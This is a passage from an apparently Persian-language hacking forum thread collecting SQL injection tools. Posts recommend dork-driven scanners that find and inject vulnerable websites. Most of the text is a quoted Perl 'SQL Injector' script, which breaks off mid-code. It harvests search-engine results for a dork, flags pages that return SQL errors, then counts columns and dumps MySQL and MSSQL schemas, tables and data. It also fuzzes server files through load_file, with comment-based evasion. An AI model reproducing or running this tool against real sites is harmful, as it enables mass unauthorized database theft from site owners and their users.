مرجع ابزارهای SQL Injection - صفحه 3

**dmayor64** · 07-24-2010, 06:50 AM

I want to know how to scan for admin and password

**uones** · 08-12-2010, 10:21 PM

با سلام دوستان اینم از برنامه ExploitScanner که کارش حرف نداره .یهdork بهش می دی اسکن میکنه بعد از اینکه اسکن کرد تست رو می زنیم( البته با توجه به dork و تیک اسیب پذیری که انتخاب می کنید ) و سایت هایی که باگ دارند رو به ما نشون میده و بعد هم اینجکت.

**firemaker** · 12-04-2010, 12:23 PM

با سلام

SQLInject Finder یک ابزار برای یافتن Injection هست که با زبان Python نوشته شده و به عنوان ورودی
یک فایل با پسوند pcap. که از فایلهای Wireshark هست رو دریافت می کنه و از میان Request های درون آن ، سعی می کنه مسیر های مشکل دار رو تشخیص بده که با دستور زیر اجرا می شه و خروجی در فایل capture.tsv ریخته می شه :

python sqlinject-finder.py -f capture.pcap -t > capture.tsv

link :
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]

با تشکر

**Dork** · 12-22-2010, 07:21 PM

سلام...

تولز قوی برای Union کردن:

ورژن ExploitMyUnion v2.1 که توسط sourceforge.net ارائه شده است.

**firemaker** · 05-17-2011, 12:43 PM

با سلام

Safe3si ابزاری است که برای Sql Injection می شه از اون استفاده کرد که دوستان برای دانلود می تونند به لینک زیر مراجعه کنند (البته گفته باشم قدرتش به Havij نمی رسه)

[فقط اعضای سایت قادر به دیدن لینکها میباشند ]

با تشکر

**jospyro** · 07-16-2011, 07:30 AM

نقل قول:

نوشته اصلی توسط 777

يك Injector به زبان perl هم براي SQLi وهم براي MySQLi

کد:

#!/usr/bin/perl
#
# OOO  OOO           OO    OO        OO
#  OO   O             O     O         O
#  O O  O  OO  OO     O     O        O O   OO OOO   OOOO    OOOOO
#  O  O O   O   O     O     O        OOO    OO     OOOOOO       O
#  O   OO   O   O     O     O       O   O   O      O       OOOOOO
# OOO  OO   OOOOO   OOOOO OOOOO    OOO OOO OOOOO    OOOOO  OOOO OO
################################################################################################################################
#                                             SQL INJECTOR 
################################################################################################################################

#proxy support
#URl Extractor + vuln scanner & checker



use LWP::UserAgent;
use HTTP::Request;

sub help
{
     system('cls');
     system('title SQL InJeCtoR v2.0');
     print "\n\n-----------------------------------\n";
     print "[!] Usage : perl $0 <option>\n";
     print "\n\n--/// MySQL\n";
     print "     --mysqlcol         MySQL column length calculator            MySQL v4/5\n";
     print "     --mysqldetails     MySQL target website db global infos      MySQL v4/5\n";
     print "     --mysqlschema      MySQL Full Schema Extractor               MySQL v5\n";
     print "     --mysqldump        MySQL Data Dump                           MySQL v4/5\n";
     print "     --mysqlfile        MySQL load_file fuzzer                    MySQL v4/5\n";
     print "     --mysqltblfuzz     MySQL Table_name Fuzzer                   MySQL v4\n";
     print "     --mysqlcolfuzz     MySQL Column_name Fuzzer                  MySQL v4\n";
	 print "\n\n--/// MsSQL\n";
	 print "     --mssqldetails      MsSQL DB global info\n";
	 print "     --mssqltable        MsSQL Tables Extractor\n";
	 print "     --mssqlcolumns      MsSQL Columns Extractor\n";
	 print "     --mssqldump         MsSQL Columns Extractor\n";
	 print "\n\n--/// Vulunerability Scanner\n";
	 print "     --dork              URL Extractor , SQL Vulnerability's Scanner & checker\n";
	 print "\n\n--/// Options\n";
	 print "     --proxy             define a proxy to use\n";
	 print "     --listfile          list of columns or tables to use in fuzz or load_file files list\n";
	 print "     --output            save injection or scan result in an outside file\n";
	 print "     --table             table to use in dumping data or in tbles extract\n";
	 print "     --column            column to use in dumping data or in column extract\n";
	 print "     --help              print this help text :P\n";
     exit();
}

sub variables
{
     my $i=0;
     foreach (@ARGV)
     {
         if ($ARGV[$i] eq "--dork"){$search_dork = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlcol"){$mysql_count_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqldetails"){$mysql_details_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlschema"){$mysql_schema_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqldump"){$mysql_dump_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqltblfuzz"){$mysql_fuzz_table = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlcolfuzz"){$mysql_fuzz_column = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mysqlfile"){$mysql_load_file = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqldetails"){$mssql_details_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqltable"){$mssql_table_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqlcolumn"){$mssql_column_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--mssqldump"){$mssql_dump_target = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--column"){$sql_dump_column = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--table"){$sql_dump_table = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--evasion"){$evasion = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--output"){$vulnfile = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--proxy"){$proxy = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--listfile"){$word_list = $ARGV[$i+1]}
         if ($ARGV[$i] eq "--help"){&help}
         $i++;
     }
}

sub main
{
     system('cls');
     system('title SQL InJeCtoR');
	 if (@ARGV<1){print "[!] For Help : perl $0 --help\n\n\n" ;}
}

sub vulnscanner
{
     checkgoogle();
     googlescan($search_dork);
     askscan($search_dork);
}

sub checkgoogle
{
	 my $request   = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$search_dork&btnG=Search&start=10");
     my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
     $useragent->proxy("http", "http://$proxy/") if defined($proxy);
     my $response  = $useragent->request($request) ;
     my $result    = $response->content;
	 if ($result   =~ m/if you suspect that your computer or network has been infected/i){print "[!] You Have Been Banned From Google Search :( \n";exit()}
}		 

sub googlescan
{
     my $dork  = $_[0];
     for ($i=0;$i<200;$i=$i+10)
     {
         my $request   = HTTP::Request->new(GET => "http://www.google.com/search?hl=en&q=$dork&btnG=Search&start=$i");
         my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
	     $useragent->proxy("http", "http://$proxy/") if defined($proxy);
         my $response  = $useragent->request($request) ;
         my $result    = $response->content;
         while ($result =~ m/class=r><a href=\"(.*?)\" class=l>/g )
		 {
		     print "[!] Trying to fuzz $1\n";	 
		     checkvuln($1)
		 }
     }				  
}

sub askscan
{
     my $dork  = $_[0];
     for ($i=0;$i<20;$i++)
     {
         my $request   = HTTP::Request->new(GET => "http://www.ask.com/web?q=page.php?id=&qsrc=0&o=0&l=dir&q=$dork&page=$i&jss=");
         my $useragent = LWP::UserAgent->new(agent => 'FAST-WebCrawler/3.3');
		 $useragent->proxy("http", "http://$proxy/") if defined($proxy);
         my $response  = $useragent->request($request) ;
         my $result    = $response->content;
         while ($result =~ m/<span id=\"r(.*)_u\" class=\"(.*)\">(.*)<\/span>/gi)
		 {
			 my $askurl ="http://".$3 ;
			 print "[!] Trying to fuzz $askurl\n";
			 checkvuln($askurl);
		 }
	 }
}

sub checkvuln
{
     my $scan_url   = $_[0];
     my $link       = $scan_url.'0+order+by+9999999--';
	 my $ua         = LWP::UserAgent->new();
	 $ua->proxy("http", "http://$proxy/") if defined($proxy);
     my $req        = $ua->get($link);
	 my $fuzz       = $req->content;
	 if ($fuzz =~ m/You have an error in your SQL syntax/i || $fuzz =~ m/Query failed/i || $fuzz =~ m/SQL query failed/i || $fuzz =~ m/mysql_fetch_/i || $fuzz =~ m/mysql_fetch_array/i || $fuzz =~ m/mysql_num_rows/i || $fuzz =~ m/The used SELECT statements have a different number of columns/i )
	 {
	     print "[!] MySQL Vulnerable     -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@mysqlvuln,"$scan_url\n");
		 }
	 }
	 elsif ($fuzz =~ m/ODBC SQL Server Driver/i)
	 {
	     print "[!] MsSQL Vulnerable     -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@mssqlvuln,"$scan_url\n");
		 }
	 }
	 elsif ($fuzz =~ m/Microsoft JET Database/i || $fuzz =~ m/ODBC Microsoft Access Driver/i )
	 {
	     print "[!] MS Access Vulnerable -> $scan_url\n";
		 if (defined($vulnfile))
         { 
		     push (@accessvuln,"$scan_url\n");
		 }
	 }
}

sub mysqlcount
{
     my $site   = $_[0];
     my $ev     = $_[1];
     my $null   = "09+and+1=" ;
     my $code   = "0+union+select+" ;
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $injection = $site.$null.$code."0",$com ;
     my $useragent = LWP::UserAgent->new();
	 $useragent->proxy("http", "http://$proxy/") if defined($proxy);
     my $response  = $useragent->get($injection);
     my $result   = $response->content;
     if( $result =~ m/You have an error in your SQL syntax/i || $result =~ m/Query failed/i || $result =~ m/SQL query failed/i || $result =~ m/mysql_fetch_/i || $result =~ m/mysql_fetch_array/i || $result =~ m/mysql_num_rows/i || $result =~ m/The used SELECT statements have a different number of columns/i )
     {
          print "\n[!] This Website Is Vulnerable\n" ;
	      print "[+] Working On It\n";
     }
     else
     {
         print "\n[!] This WebSite Is Not SQL Vulnerable !\n";
         exit();
     }
     for ($i = 0 ; $i < 100 ; $i ++)
     {
	     $col.=','.$i;
	     $specialword.=','."0x617a38387069783030713938";
         if ($i == 0)
         {
             $specialword = '' ; 
             $col = '' ;
         }
         $sql=$site.$null.$code."0x617a38387069783030713938".$specialword.$com ;
	     $ua = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	     $rq = $ua->get($sql);
		 $response = $rq->content;
	     if($response =~ /az88pix00q98/)
         {
             $i ++;			 
             print "\n[!] MySQL Column Count Finished\n" ;
             print "[!] This WebSite Have $i Columns\n" ;
             $sql=$site.$null.$code."0".$col.$com ;
		     print "=> ".$sql ."\n\n";	
			 if (defined($vulnfile))
			 {
			     open(vuln_file,">>$vulnfile") ;
                 print vuln_file "Target Host : $site\n";
                 print vuln_file "Evasion     : $ev\n";
                 print vuln_file "Col length  : $i\n";
                 print vuln_file "Injection   : $sql\n";
                 close(vuln_file);
                 print "[+] Result Saved to $vulnfile\n";
			 }
             exit () ;		 
         }	
     }
}

sub mysqldetails
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,version(),0x617a38387069783030713938,database(),0x617a38387069783030713938,user(),0x617a38387069783030713938)";
     print "\n[+] Info Getting, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
         my $newlink = $1.$selection.$2.$com;
         my $ua = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	     my $request = $ua->get($newlink);
	     my $content = $request->content;
         if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
         {
	         print "[!] Database Version  : $1\n";
             print "[!] Database Name     : $2\n";						  
             print "[!] DB UserName       : $3\n";						  
			 if (defined($vulnfile))
			 {
			     open(vuln_file,">>$vulnfile") ;
                 print vuln_file "[!] Target            : $site\n";
                 print vuln_file "[!] evasion           : $ev\n";
                 print vuln_file "[!] Database Version  : $1\n";
                 print vuln_file "[!] Database Name     : $2\n";
                 print vuln_file "[!] DB UserName       : $3\n";
                 close(vuln_file);
                 print "\n[+] Result Saved to $vulnfile\n";
			 }
             exit () ;			 
		 }
		 else
		 {
		     print "[!] Failed\n";
			 exit () ;	
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlschema
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my @schema=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,column_name,0x617a38387069783030713938,table_name,0x617a38387069783030713938,table_schema,0x617a38387069783030713938)";
     print "\n[+] Schema Extracting, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Column :|: Table :|: Database\n"; 
         for ($i=0;  $i<=1500 ; $i++ )
         {
	         $newstring = $1.$selection.$2.$add.'from'.$add.'information_schema.columns'.$add.'LIMIT'.$add.$i.','.'1'.$com;
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98(.*)az88pix00q98(.*)az88pix00q98(.*)az88pix00q98/)
             { 
				 print "[!] $1 :|: $2 :|: $3 \n";
				 push (@schema,"$1 :|: $2 :|: $3 \n");
		     }
	     }
		 if (defined($vulnfile))
		 {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Schema  :: ----     \n\n\n";
		     $i=0;
		     foreach(@schema)
		     {
                 print vuln_file $schema[$i]."\n";
			     $i++;
		     }
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqldump
{
     my $site   = $_[0];
     my $colm   = $_[1];
     my $tble   = $_[2];
     my $ev     = $_[3];
	 print "[+] Table name $tble\n";
	 print "[+] Column name $colm\n";
	 my @dumper=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
     my $selection = "concat(0x617a38387069783030713938,$colm,0x617a38387069783030713938)";
     print "\n[+] Data Dump Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
	     $i=0;
		 print "[+] Dumped Data : //// \n"; 
         do
         {
	         $newstring = $1.$selection.$2.$add.'from'.$add.$tble.$add.'LIMIT'.$add.$i.','.'1'.$com;			 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98(.*)az88pix00q98/)
             { 
				 print "[!] $1 \n";
                 push(@dumper,"$1\n");
		     }
			 $i++;
	     }
		 while ($i<1500);
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Dumped Column     : $colm\n";
             print vuln_file "[!] Dumped Table      : $tble\n";
             print vuln_file "[!] Data  :: ----     \n\n\n";
		     $i=0;
		     foreach(@dumper)
		     {
                 print vuln_file $dumper[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfuzztable
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 print "[+] File List $filelst\n";
	 my @tbles_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] Fuzzing Table, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
		     print "[!] Trying To Fuzz Table_name with $word_list_search[$i]";
	         $newstring = $1."0x617a38387069783030713938".$2.$add.'from'.$add.$word_list_search[$i].$com;				 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98/)
             { 
				 print "\n[!] Found Table ! $word_list_search[$i] \n";
                 push(@tbles_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Tbles Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@tbles_possible)
		     {
                 print vuln_file $tbles_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfuzzcolumn
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 my $tablext = $_[3];
	 print "[+] File List $filelst\n";
	 print "[+] Table To Fuzz Columns $tablext\n";
	 my @cols_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] Fuzzing Column, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
		     print "[!] Trying To Fuzz Column_name with $word_list_search[$i]";
	         $newstring = $1."concat(0x617a38387069783030713938,$word_list_search[$i])".$2.$add.'from'.$add.$tablext.$com;				 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
             if ($content =~ /az88pix00q98/)
             { 
				 print "\n[!] File Column ! $word_list_search[$i] \n";
                 push(@cols_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Cols Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@cols_possible)
		     {
                 print vuln_file $cols_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mysqlfile
{
     my $site    = $_[0];
     my $ev      = $_[1];
     my $filelst = $_[2];
	 print "[+] File List $filelst\n";
	 my @cols_possible=();
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 open (word_list_file,"$filelst") or die "[!] Couldnt Open WordList File $!\n";
	 @word_list_search = <word_list_file> ;
     print "\n[+] File Fuzz, Started Please Wait ....\n\n";
	 if ($site =~ /(.*)NullArea(.*)/i)
     {
		 print "[+] Fuzz Result : //// \n\n";
         $i=0;		 
         foreach (@word_list_search)
         {
	         $newstring = $1."concat(0x617a38387069783030713938,load_file('$word_list_search[$i]'))".$2.$com;			 
             my $ua = LWP::UserAgent->new();
			 $ua->proxy("http", "http://$proxy/") if defined($proxy);
	         my $request = $ua->get($newstring);
	         my $content = $request->content;
			 print "[!] Trying To Fuzz Load_File with $word_list_search[$i]";
             if ($content =~ m/az88pix00q/i)
             { 
				 print "\n[!] Found File ! $word_list_search[$i] \n";
                 push(@cols_possible,"$word_list_search[$i]\n");
		     }
			 $i++;
	     }
		 if (defined($vulnfile))
	     {
		     open(vuln_file,">>$vulnfile") ;
             print vuln_file "[!] Target            : $site\n";
             print vuln_file "[!] evasion           : $ev\n";
             print vuln_file "[!] Wordlist          : $filelst\n";
             print vuln_file "[!] Files Found  :: ----     \n\n\n";
		     $i=0;
		     foreach(@cols_possible)
		     {
                 print vuln_file $cols_possible[$i]."\n";
			     $i++;
		     }
             close(vuln_file);
             print "\n[+] Result Saved to $vulnfile\n";
		 }
	 }
	 else 
	 {
	     print "[+] Please Enter the target this way :\n http://target.net/page.php?id=0+union+select+1,2,nullarea,3\n";
         exit () ;			 
	 }
}

sub mssqldetails
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Getting Infos, Started Please Wait ....\n\n";
     $version = "convert(int,(select".$add."\@\@version));--" ;
     $system_user = 'convert(int,(select'.$add.'system_user));--';
     $db_name = 'convert(int,(select'.$add.'db_name()));--';
     $servername = 'convert(int,(select'.$add.'@@servername));--' ;
     my $injection = $site.$version ;
     my $request   = HTTP::Request->new(GET=>$injection);
     my $useragent = LWP::UserAgent->new();
     $useragent->timeout(10);
     my $response  = $useragent->request($request)->as_string ;
     if ($response =~ /.*?value\s'/)
	 {
	     print "[+] This Website Is SQL Vulnerable ..\n";
	     print "[+] Working On It ..\n";
         $ver = $1 if ($response =~ /.*?value\s'(.*?)'\sto.*/sm) ;
	     print "\n[!] MsSQL Version Is :";
	     print "\n\n => $ver"	;
	     my $injection = $site.$system_user ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $system_user = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL System_User Is    :";
	     print "  $system_user  "	;
         my $injection = $site.$db_name ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $db_name = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL Database Name Is  :";
	     print "  $db_name  "	;		  
	     my $injection = $site.$servername ;
         my $request   = HTTP::Request->new(GET=>$injection);
         my $useragent = LWP::UserAgent->new();
         $useragent->timeout(10);
         my $response  = $useragent->request($request)->as_string ;
	     $servername = $1 if ($response =~ /.*value\s'(.*)'\sto.*/);
         print "\n[!] MsSQL Server Name Is    :";
	     print "  $servername  "	;	
         exit ();					   
	 }
	 else 
	 {
	     system ("cls");
	     print "\n[!] This Website Is Not SQL Vulnerable !";
	     exit();
	}
}

sub mssqltable
{
     my $site   = $_[0];
     my $ev     = $_[1];
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
     $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables));--";
     $data = "'Ws65qd798sqd9878'";
	 print "[!] Tables : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@exttbles,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."table_name".$add."from".$add."information_schema.tables".$add."where".$add."table_name".$add."not".$add."in".$add."$total));--";	
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@exttbles)
		 {
             print vuln_file $exttbles[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

sub mssqlcolumn
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my $tblextrct = $_[2];
	 print "[+] Table To Extract From $tblextrct\n";
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
	 $data = "'Ws65qd798sqd9878'";
     $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."($data)"."));--";
	 print "[!] Columns : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@extcols,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."column_name".$add."from".$add."information_schema.columns".$add."where".$add."table_name"."="."'$tblextrct'".$add."And".$add."column_name".$add."not".$add."in".$add."$total"."));--";	
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@extcols)
		 {
             print vuln_file $extcols[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

sub mssqldump
{
     my $site   = $_[0];
     my $ev     = $_[1];
	 my $tblextrct = $_[2];
	 my $colmextrct = $_[3];
	 print "[+] Table  : $tblextrct\n";
	 print "[+] Column : $colmextrct\n";
     if ($ev eq '/*') 
	 {$add = "/**/" ; $com = "/*";}
     elsif ($ev eq '%20') 
	 {$add = "%20" ; $com = "%00" ;}
     else 
	 {$add = '+' ; $com ='--';}
	 print "\n[+] Table Extracting, Started Please Wait ....\n\n";
	 $data = "'Ws65qd798sqd9878'";
     $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."($data)"."));--";
	 print "[!] Columns : //// \n\n"; 
     for ($i;$i<1500;$i++)
     {
         my $injection = $site.$table ;
         my $useragent = LWP::UserAgent->new();
		 $ua->proxy("http", "http://$proxy/") if defined($proxy);
         my $request   = $useragent->get($injection);
         my $response  = $request->content;
         if ($response =~ /.*?value\s'(.*?)'\sto.*/sm)
         {
	         print "[+] ".$1."\n";
			 push (@dumpdata,$1);
	         $start = "(";
	         $data .= ",'$1'";
	         $end   = ")";
	         $total = $start.$data.$end;
	         $table = "convert(int,(select".$add."top".$add."1".$add."$colmextrct".$add."from".$add."$tblextrct".$add."where".$add."$colmextrct".$add."not".$add."in".$add."$total"."));--";
         }
     }
	 if (defined($vulnfile))
     {
		 open(vuln_file,">>$vulnfile") ;
         print vuln_file "[!] Target            : $site\n";
         print vuln_file "[!] evasion           : $ev\n";
         print vuln_file "[!] Data  :: ----     \n\n\n";
		 $i=0;
		 foreach(@dumpdata)
		 {
             print vuln_file $dumpdata[$i]."\n";
			 $i++;
		 }
         close(vuln_file);
         print "\n[+] Result Saved to $vulnfile\n";
	 }
}

variables();
main();

if (defined($search_dork))
{
     print "[+] Vulnerability Scan\n" ;
     print "[+] Dork : $search_dork\n\n\n" ;
     vulnscanner();
	 if (defined($vulnfile))
     {
         open(vuln_file,">>$vulnfile") ;
         print vuln_file @mysqlvuln;
         print vuln_file @mssqlvuln;
         print vuln_file @accessvuln;
         close(vuln_file);
         print "[+] Result Saved to $vulnfile\n";
         exit();
     }
} 

if (defined($mysql_count_target))
{
     print "[+] MySQL Column Counter\n\n" ;
     print "[+] Target : $mysql_count_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqlcount($mysql_count_target,$evasion);
}

if (defined($mysql_details_target))
{
     print "[+] MySQL database details\n\n" ;
     print "[+] Target : $mysql_details_target\n" ;
     if ($evasion eq '/*')
	 {
	     print "[+] Evasion : /**/\n" ;
	 }
     elsif ($evasion eq '%20')
	 {
	     print "[+] Evasion : %20\n" ;
	 }
	 else
	 {
	     print "[+] Evasion : --\n" ;
		 $evasion = "--"
	 }
	 mysqldetails($mysql_details_target,$evasion);
}

if (defined($mysql_schema_target))
{
     print "[+] MySQL Schema Extractor details\n\n" ;
     print "[+] Target : $mysql_schema_target\n" ;
     if ($evasion eq '/*')
	 {
